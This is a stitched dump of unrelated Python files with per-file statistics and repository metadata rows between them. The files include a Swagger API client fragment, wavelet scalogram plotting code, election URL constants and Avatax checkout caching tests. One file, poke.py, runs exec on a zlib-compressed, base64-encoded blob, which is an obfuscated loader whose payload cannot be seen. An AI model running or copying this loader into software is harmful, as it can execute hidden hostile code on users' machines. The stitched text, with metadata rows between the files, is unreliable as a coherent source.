if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Template',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_post(self, **kwargs):
"""
Create a new instance of the model and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Design data: Model instance data
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_post_with_http_info(**kwargs)
else:
(data) = self.designs_post_with_http_info(**kwargs)
return data
def designs_post_with_http_info(self, **kwargs):
"""
Create a new instance of the model and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Design data: Model instance data
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/Designs'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
| 41.21104
| 165
| 0.559737
| 43,400
| 418,086
| 5.170507
| 0.007074
| 0.063458
| 0.02221
| 0.028556
| 0.993561
| 0.992242
| 0.991404
| 0.98709
| 0.984577
| 0.979817
| 0
| 0.000651
| 0.352954
| 418,086
| 10,144
| 166
| 41.215103
| 0.82886
| 0.304394
| 0
| 0.850197
| 0
| 0
| 0.187662
| 0.06983
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037191
| false
| 0
| 0.001454
| 0
| 0.094328
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3df24bc9e6a96e12009692b63b381a4d5506bada
| 98
|
py
|
Python
|
recurring_content_detector/__init__.py
|
lcd1232/recurring-content-detector
|
31e502e16b0d9870a6e3e4eb3bfe93d058cd01b0
|
[
"MIT"
] | 46
|
2019-06-12T10:43:47.000Z
|
2022-03-15T12:17:13.000Z
|
recurring_content_detector/__init__.py
|
lcd1232/recurring-content-detector
|
31e502e16b0d9870a6e3e4eb3bfe93d058cd01b0
|
[
"MIT"
] | 19
|
2020-01-20T09:26:39.000Z
|
2021-12-10T13:16:08.000Z
|
recurring_content_detector/__init__.py
|
lcd1232/recurring-content-detector
|
31e502e16b0d9870a6e3e4eb3bfe93d058cd01b0
|
[
"MIT"
] | 14
|
2020-01-05T21:04:28.000Z
|
2022-02-21T08:51:04.000Z
|
from . import detector
def detect(*args, **kwargs):
return detector.detect(*args, **kwargs)
| 16.333333
| 43
| 0.683673
| 12
| 98
| 5.583333
| 0.666667
| 0.298507
| 0.477612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 98
| 5
| 44
| 19.6
| 0.817073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
9a7d76659b7e05a8f243d269b95b2bce2cbcf5d7
| 894
|
py
|
Python
|
poke.py
|
Wizzly0/RelaxsTeam
|
37e294a34b34279afe6290668b753716cca37cf0
|
[
"Apache-2.0"
] | null | null | null |
poke.py
|
Wizzly0/RelaxsTeam
|
37e294a34b34279afe6290668b753716cca37cf0
|
[
"Apache-2.0"
] | null | null | null |
poke.py
|
Wizzly0/RelaxsTeam
|
37e294a34b34279afe6290668b753716cca37cf0
|
[
"Apache-2.0"
] | null | null | null |
#Compiled By Wizzly
import marshal,zlib,base64
exec(zlib.decompress(base64.b64decode("eJzlVV1r2zAUfdevuLgPlSDYTToKy9ZAaLdR2m1lDexhBmNiJRGJP5CUtVnd/757JTt1l4X2pTCYHmJd6ejcq3OPHZVXpbag0yIrc6Z8ZMrpUto2sgst00wV83ahNIyVJjQbY2XOD6crmepDwSqtCsuDIIiPjo9/vO3nLMEBkLgHTvxwk+16EznENnxEsJrCuHabNdSeIoIYf2OII5y6DajpUNLiPAKfiIAaSepEUOgo6oYjaVggiikxBdDsE0WDwDiOakeC8XuicpXQEZfcMRAPzl2ShqSLcKSOBI/GSeyuWrvfKImoiiTGSbMTuUqaJB2Ev2fNUGLBmKrgFIzVXBXVGnV3qvffoe4juKjgRuqfUsMQAoGtobadAvWnQY/gmtaeoKzKpfkT9j1d2jVcp+QI0wKdI3agT0HsAMbW4hLL5Axu1a8sKw0XQ9YaIUttihTeemGy9hPePxq8EVvQ7UKtJEz0Wj4ebIfVm93FdlB13sehf/AmGn9MLr58mPTa3ZuvZ5fJ+adv489iL1maZRr5uJO7Ej26Nmkq9h+ZlRruUB+631xyp63YX+627NDIIrMlJ3V6lHd/Cv/CzQIvM76g1E7sJnZ/NBpBa4iT/F5VD8N7KvgBOjahjqECcLWGq3Su4FwtlVZ5sJtR3k1lZfdX/3qVsIPxZDI+uxx0XTR4iY1O/jUTmXBaFoWcWo4e6j1jH+8D54JX8tgz3P+FufAbNfHfMkZabjpa+uWOmnaBZtj+F4b+HLepnkv6tjbWFB18aHDXcsHkyvzNeS8iHOwK1mH+DUNbDz4=")))
| 298
| 847
| 0.951902
| 37
| 894
| 23
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137233
| 0.005593
| 894
| 3
| 847
| 298
| 0.820023
| 0.020134
| 0
| 0
| 0
| 0.5
| 0.917808
| 0.917808
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
9a845b3cdff415d4a090b8bb91fa92bc118d9eb7
| 15,803
|
py
|
Python
|
kwakpriv/plotting/scalograms.py
|
alexxromero/WAKY-private
|
aa15d9d138ba22e04628590f2c9583a86f2e54f2
|
[
"MIT"
] | null | null | null |
kwakpriv/plotting/scalograms.py
|
alexxromero/WAKY-private
|
aa15d9d138ba22e04628590f2c9583a86f2e54f2
|
[
"MIT"
] | null | null | null |
kwakpriv/plotting/scalograms.py
|
alexxromero/WAKY-private
|
aa15d9d138ba22e04628590f2c9583a86f2e54f2
|
[
"MIT"
] | null | null | null |
"""
Plotting Functions
Functions that generate the wavelet scalograms.
"""
from __future__ import absolute_import
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from matplotlib.colors import Normalize, LogNorm
from matplotlib.colorbar import ColorbarBase
from matplotlib import cm
from ..w_transform import HaarTransform, InvHaarTransform
from .plottingtools import _BinData, _findmin, _findmax
from .plottingtools import _NewColorMap, _NSigmaFilter
__all__ = ['wScalogram', 'wScalogram_nsig']
Data_color='#0782B0'
Coeffs_color='#69B4F2'
Firsttrend_color=Coeffs_color
Nsigma_color='#54B959'
def wScalogram(data, hypothesis=None,
nsigma=None, nsigma_min=None, nsigma_percent=1,
reconstruction_scaled=False,
firsttrend=False,
logscale=True,
filled=False,
title=None,
titlesize=18,
xlabel=None,
textsize=14,
textpos=0.91,
figsize=(12,12),
ticksize=11,
ypad=0,
markersize=3,
outputfile=None):
"""
Function that generates a bar plot of the wavelet coefficients of the data array
per level.
Parameters
----------
data : array
Array to calculate the discrete Haar wavelet transform on.
firsttrend : bool
Whether to include the first trend on the scalogram plot.
filled : bool
Whether to fill the bars or just show their contour.
outputfile : string
Name of the png file to save the plot to. If None, don't print the plot.
"""
WaveDec_data = HaarTransform(data)
Ccoeffs = WaveDec_data[:-1]
FirstTrend = WaveDec_data[-1]
Level = len(Ccoeffs)
nlevels = Level if firsttrend==False else Level+1
nrows = nlevels+1 # the first panel is the data histogram
if nsigma is not None:
nrows += 1 # add another panel for the generating function
ratio = [1.5]
ratio += [1]*(nrows-1)
if filled==True:
histtype='bar'
coeffs_color=Coeffs_color
firsttrend_color=Firsttrend_color
else:
histtype='step'
coeffs_color='black'
firsttrend_color='black'
if logscale==True:
scale='log'
else:
scale='linear'
fig = plt.figure(figsize=figsize)
gs = gridspec.GridSpec(ncols=1, nrows=nrows,
height_ratios=ratio,
hspace=0)
axs = [fig.add_subplot(gs[i,0]) for i in range(nrows)]
# Fill out top panel
data_hist, _, data_center, data_width = _BinData(data, bins=2**Level)
axs[0].bar(data_center, data_hist, align='center',
width=data_width, color=Data_color)
axs[0].tick_params(axis='both', labelsize=ticksize)
axs[0].text(x=textpos, y=.63, s='Data', fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[0].transAxes)
axs[0].set_yscale(scale)
# If nsigma is provided
if nsigma is not None:
nsigCcoeffs = nsigma
cut = '(No cut)'
if nsigma_percent is not None:
cut = str(nsigma_percent*100) + '%'
if nsigma_min is not None:
cut = r'$\sigma_{min}$ = ' + str(nsigma_min)
if hypothesis is not None:
#TODO: error trap
DeltaCoeff = _NSigmaFilter(data, hypothesis, nsigma, nsigma_min, nsigma_percent)
ReconstructedData = InvHaarTransform(DeltaCoeff, normalize=False)
if reconstruction_scaled is True:
RecData = np.divide(ReconstructedData, np.sqrt(hypothesis))
else:
RecData = ReconstructedData
rec_hist, _, rec_center, rec_width = _BinData(RecData, bins=2**Level)
axs[1].plot(rec_center, rec_hist, 'o', markersize=markersize, color='#E67E22',
label='Reconstruction ({})'.format(cut))
axs[1].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[1].tick_params(axis='x', labelbottom=False)
axs[1].set_yscale('linear')
axs[1].legend(edgecolor="black", fancybox=False, borderpad=.2,
handletextpad=0.0, handlelength=0, markerscale=0, fontsize=textsize)
# If firsttrend, fill out the bottom panel with the first trend
if firsttrend==True:
bins = 1
n, binning, patches = axs[-1].hist(x=range(bins), bins=bins, weights=FirstTrend,
histtype=histtype, color=firsttrend_color)
axs[-1].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[-1].tick_params(axis='x', labelbottom=False)
axs[-1].set_xticks(np.linspace(binning[0], binning[-1], 2**(Level-1)))
axs[-1].set_yscale(scale)
axs[-1].text(x=textpos, y=.63, s=r'$\ell={%.1i}$'%(0), fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[-1].transAxes)
# Fill out the rest of the pannels with the wavelet coefficients
# If signal_only, start two panels below the top panel
s = 2 if nsigma is not None else 1
for l in range(Level):
bins=2**(Level-l-1)
coeffs = Ccoeffs[l]
if logscale==True:
# Plot the positive coefficients
pos_ix = np.where(Ccoeffs[l]>0)
pos_coeffs = np.zeros_like(coeffs)
for i in pos_ix:
pos_coeffs[i] = coeffs[i]
axs[l+s].hist(x=range(bins), bins=bins,
weights=pos_coeffs, histtype=histtype, color=coeffs_color)
# Now plot the negative coefficients. The bars are hashed to distinguish the
# pos and neg coefficients.
neg_ix = np.where(Ccoeffs[l]<0)
neg_coeffs = np.zeros_like(coeffs)
for j in neg_ix:
neg_coeffs[j] = np.absolute(coeffs[j])
n, binning, patches = axs[l+s].hist(x=range(bins), bins=bins,
weights=neg_coeffs, histtype=histtype, hatch='///', color=coeffs_color)
axs[l+s].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[l+s].tick_params(axis='x', labelbottom=False)
axs[l+s].set_xticks(np.linspace(binning[0], binning[-1], 2**(Level-1) ))
lev = Level-l-1
axs[l+s].text(x=textpos, y=.63, s=r'$\ell={%.1i}$'%(lev+1), fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[l+s].transAxes)
axs[l+s].set_yscale(scale)
else:
n, binning, patches = axs[l+s].hist(x=range(bins), bins=bins, weights=coeffs, histtype=histtype, color=coeffs_color)
axs[l+s].plot(binning, np.zeros_like(binning), color='black', linewidth=0.5)
axs[l+s].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[l+s].tick_params(axis='x', labelbottom=False, labelsize=ticksize)
axs[l+s].set_xticks(np.linspace(binning[0], binning[-1], 2**(Level-1) ))
lev = Level-l-1
axs[l+s].text(x=textpos, y=.63, s=r'$\ell={%.1i}$'%(lev+1), fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[l+s].transAxes)
axs[l+s].set_yscale(scale)
if title is not None:
fig.suptitle(title, fontsize=titlesize, y=0.92)
fig.text(x=0.5, y=0.1, s=xlabel, fontsize=textsize)
if outputfile is not None:
plt.savefig(outputfile, bbox_inches='tight')
plt.show()
def wScalogram_nsig(data, hypothesis=None,
nsigma=None, nsigma_min=None, nsigma_percent=1,
reconstruction_scaled=False,
firsttrend=False,
logscale=True,
title=None,
titlesize=18,
xlabel=None,
textsize=14,
figsize=(12,12),
textpos=0.91,
ticksize=11,
markersize=3,
outputfile=None):
"""
Function that generates a bar plot of the wavelet coefficients of the data array
per level.
Parameters
----------
data : array
Array to calculate the discrete Haar wavelet transform on.
nsigma : array
Nsigma array to use as the color-code for the wavelet coefficients.
firsttrend : bool
Whether to include the first trend on the scalogram plot.
logscale : bool
Whether to use a linear of log scale on the y-axis .
outputfile : string
Name of the png file to save the plot to. If None, don't print the plot.
"""
WaveDec_data = HaarTransform(data)
Ccoeffs = WaveDec_data[:-1]
FirstTrend = WaveDec_data[-1]
Level = len(Ccoeffs)
if logscale==True:
scale='log'
else:
scale='linear'
nlevels = Level if firsttrend==False else Level+1
nrows = nlevels+1 # the first panel is the data histogram
if nsigma is not None:
nrows += 1 # add another panel for the generating function
ratio = [1.5]
ratio += [1]*(nrows-1)
fig = plt.figure(figsize=figsize)
gs = gridspec.GridSpec(ncols=1, nrows=nrows,
height_ratios=ratio,
hspace=0)
axs = [fig.add_subplot(gs[i,0]) for i in range(nrows)]
cbar_axs = fig.add_axes([0.93, 0.15, 0.02, 0.7]) # colorbar axis
# Fill out top panel
data_hist, _, data_center, data_width = _BinData(data, bins=2**Level)
axs[0].bar(data_center, data_hist, align='center', width=data_width, color=Data_color)
axs[0].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[0].tick_params(axis='x', labelbottom=False)
axs[0].set_yscale(scale)
axs[0].text(x=textpos, y=.63, s='Data', fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[0].transAxes)
# If nsigma function is provided
if nsigma is not None:
nsigCcoeffs = nsigma
cut = '(No cut)'
if nsigma_percent is not None:
cut = str(nsigma_percent*100) + '%'
if nsigma_min is not None:
cut = r'$\sigma_{min}$ = ' + str(nsigma_min)
if hypothesis is not None:
#TODO: error trap
DeltaCoeff = _NSigmaFilter(data, hypothesis, nsigma, nsigma_min, nsigma_percent)
ReconstructedData = InvHaarTransform(DeltaCoeff, normalize=False)
if reconstruction_scaled is True:
RecData = np.divide(ReconstructedData, np.sqrt(hypothesis))
else:
RecData = ReconstructedData
rec_hist, _, rec_center, rec_width = _BinData(RecData, bins=2**Level)
axs[1].plot(rec_center, rec_hist, 'o', markersize=markersize, color='#E67E22',
label='Reconstruction ({})'.format(cut))
axs[1].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[1].tick_params(axis='x', labelbottom=False)
axs[1].set_yscale('linear')
axs[1].legend(edgecolor="black", fancybox=False, borderpad=.2,
handletextpad=0, handlelength=0, markerscale=0, fontsize=textsize)
cmap = _NewColorMap()
binintensity = np.absolute(nsigma)
sig_min = _findmin(binintensity)
sig_max = _findmax(binintensity)
norm = Normalize(vmin=sig_min, vmax=sig_max)
# If firsttrend, fill out the bottom panel with the first trend
if firsttrend==True:
bins=1
norm_points = norm(binintensity[-1])
color_points = [cmap(i) for i in norm_points]
hist, edges, center, width = _BinData(FirstTrend, bins=1)
axs[-1].bar(center, hist, align='center', width=width, color=color_points)
axs[-1].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[-1].tick_params(axis='x', labelbottom=False)
axs[-1].set_xticks(np.linspace(edges[0], edges[-1], 2**(Level-1)))
axs[-1].set_yscale(scale)
axs[-1].text(x=textpos, y=.63, s=r'$\ell={%.1i}$'%(0), fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[-1].transAxes)
# Now plot the negative coefficients. The bars are hashed to distinguish the
# pos and neg coefficients.
s = 2 if nsigma is not None else 1
for l in range(Level):
bins=2**(Level-l-1)
coeffs = Ccoeffs[l]
norm_points = norm(binintensity[l])
color_points = [cmap(i) for i in norm_points]
if logscale==True:
# Plot the positive coefficients
pos_ix = np.where(coeffs>0)
pos_coeffs = np.zeros_like(coeffs)
for i in pos_ix:
pos_coeffs[i] = coeffs[i]
pos_hist, pos_edges, pos_center, pos_width = _BinData(pos_coeffs, bins=bins)
axs[l+s].bar(pos_center, pos_hist, align='center', width=pos_width, color=color_points)
# Now plot the negative coefficients. The bars are hashed to distinguish the
# pos and neg coefficients.
neg_ix = np.where(Ccoeffs[l]<0)
neg_coeffs = np.zeros_like(coeffs)
for j in neg_ix:
neg_coeffs[j] = np.absolute(coeffs[j])
neg_hist, neg_edges, neg_center, neg_width = _BinData(neg_coeffs, bins=bins)
axs[l+s].bar(neg_center, neg_hist, align='center', width=neg_width, color=color_points,
hatch='///')
left_edge=np.minimum(pos_edges[0], neg_edges[0])
right_edge=np.maximum(pos_edges[-1], neg_edges[-1])
axs[l+s].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[l+s].tick_params(axis='x', labelbottom=False)
axs[l+s].set_xticks(np.linspace(left_edge, right_edge, 2**(Level-1)))
lev = Level-l-1
axs[l+s].text(x=textpos, y=.63, s=r'$\ell={%.1i}$'%(lev+1), fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[l+s].transAxes)
axs[l+s].set_yscale(scale)
else:
hist, edges, center, width = _BinData(coeffs, bins=bins)
axs[l+s].plot(binning, np.zeros_like(binning), color='black', linewidth=0.5)
axs[l+s].bar(center, hist, align='center', width=width,
color=color_points)
axs[l+s].plot(range(bins), np.zeros(bins), color='black',
linewidth=0.5)
axs[l+s].tick_params(axis='y', bottom=False, labelbottom=False, labelsize=ticksize)
axs[l+s].tick_params(axis='x', labelbottom=False)
axs[l+s].set_xticks(np.linspace(edges[0], edges[-1], 2**(Level-1)))
lev=Level-l-1
axs[l+s].text(x=textpos, y=.63, s=r'$C_{l=%.1i}$'%(lev), fontsize=textsize,
bbox={'facecolor': 'white', 'alpha': 0.5, 'pad': 2},
transform=axs[l+s].transAxes)
axs[l+s].set_yscale(scale)
cbar = ColorbarBase(cbar_axs, cmap=cmap, norm=norm)
#cbar_axs.text(.5, sig_max, r'$N\sigma$', fontsize=12)
fig.text(x=0.93, y=.86, s=r'$N\sigma$', fontsize=textsize)
if title is not None:
fig.suptitle(title, fontsize=titlesize, y=0.92)
fig.text(x=0.5, y=0.1, s=xlabel, fontsize=textsize)
if outputfile is not None:
plt.savefig(outputfile, bbox_inches='tight')
plt.show()
| 42.141333
| 128
| 0.590141
| 2,053
| 15,803
| 4.439844
| 0.130054
| 0.014482
| 0.018102
| 0.036204
| 0.799342
| 0.789687
| 0.77718
| 0.754471
| 0.737575
| 0.730554
| 0
| 0.023582
| 0.283554
| 15,803
| 374
| 129
| 42.254011
| 0.781487
| 0.123964
| 0
| 0.735507
| 1
| 0
| 0.041499
| 0
| 0
| 0
| 0
| 0.005348
| 0
| 1
| 0.007246
| false
| 0
| 0.036232
| 0
| 0.043478
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9aa694fd50740b287af55b2dc30eaaaa22152542
| 261
|
py
|
Python
|
Crawler/constants.py
|
PuercoPop/EleccionesPeru
|
bdce3bc5f6d22c98361ace13b729553f8993e857
|
[
"MIT"
] | 1
|
2016-06-17T04:03:24.000Z
|
2016-06-17T04:03:24.000Z
|
Crawler/constants.py
|
PuercoPop/EleccionesPeru
|
bdce3bc5f6d22c98361ace13b729553f8993e857
|
[
"MIT"
] | null | null | null |
Crawler/constants.py
|
PuercoPop/EleccionesPeru
|
bdce3bc5f6d22c98361ace13b729553f8993e857
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
congreso_url = u'http://www.web.onpe.gob.pe/modElecciones/elecciones/elecciones2011/1ravuelta/onpe/congreso/rep_acta_cong.php'
url_prefix = u'http://www.web.onpe.gob.pe/modElecciones/elecciones/elecciones2011/1ravuelta/onpe/congreso/'
| 43.5
| 126
| 0.781609
| 37
| 261
| 5.405405
| 0.567568
| 0.05
| 0.08
| 0.11
| 0.78
| 0.78
| 0.78
| 0.78
| 0.78
| 0.78
| 0
| 0.044355
| 0.049808
| 261
| 5
| 127
| 52.2
| 0.762097
| 0.08046
| 0
| 0
| 0
| 1
| 0.836134
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b11af4e2ec21ae923894b100f9b2b8286664ddbe
| 177
|
py
|
Python
|
pyelastices/__init__.py
|
szj2ys/pyelastices
|
9018ab78531b4f577b735580500f6a7804daa823
|
[
"MIT"
] | null | null | null |
pyelastices/__init__.py
|
szj2ys/pyelastices
|
9018ab78531b4f577b735580500f6a7804daa823
|
[
"MIT"
] | null | null | null |
pyelastices/__init__.py
|
szj2ys/pyelastices
|
9018ab78531b4f577b735580500f6a7804daa823
|
[
"MIT"
] | null | null | null |
# *_*coding:utf-8 *_*
"""
Author:SZJ
"""
from .__version__ import version, __version__
from pyelastices.api import Client as Elasticsearch
from pyelastices.api import helpers
| 17.7
| 51
| 0.768362
| 22
| 177
| 5.727273
| 0.636364
| 0.238095
| 0.285714
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006494
| 0.129944
| 177
| 9
| 52
| 19.666667
| 0.811688
| 0.175141
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
b11b74b9e6650f788faa30ec29823cb285aaaf10
| 23,118
|
py
|
Python
|
saleor/plugins/avatax/tests/test_avatax_caching.py
|
greentornado/saleor
|
7f58917957a23c4dd90b47214a4500c91c735dee
|
[
"CC-BY-4.0"
] | 3
|
2021-06-22T12:38:18.000Z
|
2021-07-11T15:01:57.000Z
|
saleor/plugins/avatax/tests/test_avatax_caching.py
|
greentornado/saleor
|
7f58917957a23c4dd90b47214a4500c91c735dee
|
[
"CC-BY-4.0"
] | 111
|
2021-06-30T08:51:06.000Z
|
2022-03-28T04:48:49.000Z
|
saleor/plugins/avatax/tests/test_avatax_caching.py
|
IslamDEVO/es-saleor-nginx
|
a56a4aaf23fc308aad7b7489bc090fd4fcdb6315
|
[
"CC-BY-4.0"
] | 6
|
2021-11-08T16:43:05.000Z
|
2022-03-22T17:31:16.000Z
|
from decimal import Decimal
from unittest.mock import ANY, Mock, patch
from django.test import override_settings
from prices import Money, TaxedMoney
from ....checkout.fetch import fetch_checkout_lines
from ...manager import get_plugins_manager
from .. import CACHE_KEY, generate_request_data_from_checkout
from ..plugin import AvataxPlugin
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_total_use_cache(
mock_cache_set,
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_cache = Mock(
return_value=(
avalara_request_data,
avalara_response_for_checkout_with_items_and_shipping,
)
)
monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
# then
result = manager.calculate_checkout_total(
checkout_info, lines, checkout_info.shipping_address, []
)
# when
assert result == TaxedMoney(net=Money("72.2", "USD"), gross=Money("75", "USD"))
avalara_cache_key = CACHE_KEY + str(checkout.token)
mocked_cache.assert_called_with(avalara_cache_key)
mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_total_save_avatax_response_in_cache(
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
mocked_avalara = Mock(
return_value=avalara_response_for_checkout_with_items_and_shipping
)
monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
# then
result = manager.calculate_checkout_total(
checkout_info, lines, checkout_info.shipping_address, []
)
manager.calculate_checkout_total(
checkout_info, lines, checkout_info.shipping_address, []
)
# Second Avatax call to make sure that we use cached response
# when
assert result == TaxedMoney(net=Money("72.2", "USD"), gross=Money("75", "USD"))
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_subtotal_use_cache(
mock_cache_set,
checkout_with_items_and_shipping,
checkout_with_items_and_shipping_info,
address,
site_settings,
plugin_configuration,
avalara_response_for_checkout_with_items_and_shipping,
monkeypatch,
channel_USD,
):
# given
checkout = checkout_with_items_and_shipping
checkout_info = checkout_with_items_and_shipping_info
plugin_configuration()
manager = get_plugins_manager()
plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
site_settings.company_address = address
site_settings.save()
lines = fetch_checkout_lines(checkout)
avalara_request_data = generate_request_data_from_checkout(
checkout_info, lines, plugin.config, []
)
mocked_cache = Mock(
return_value=(
avalara_request_data,
avalara_response_for_checkout_with_items_and_shipping,
)
)
monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
# then
result = manager.calculate_checkout_subtotal(
checkout_info, lines, checkout_info.shipping_address, []
)
# when
assert result == TaxedMoney(net=Money("64.07", "USD"), gross=Money("65", "USD"))
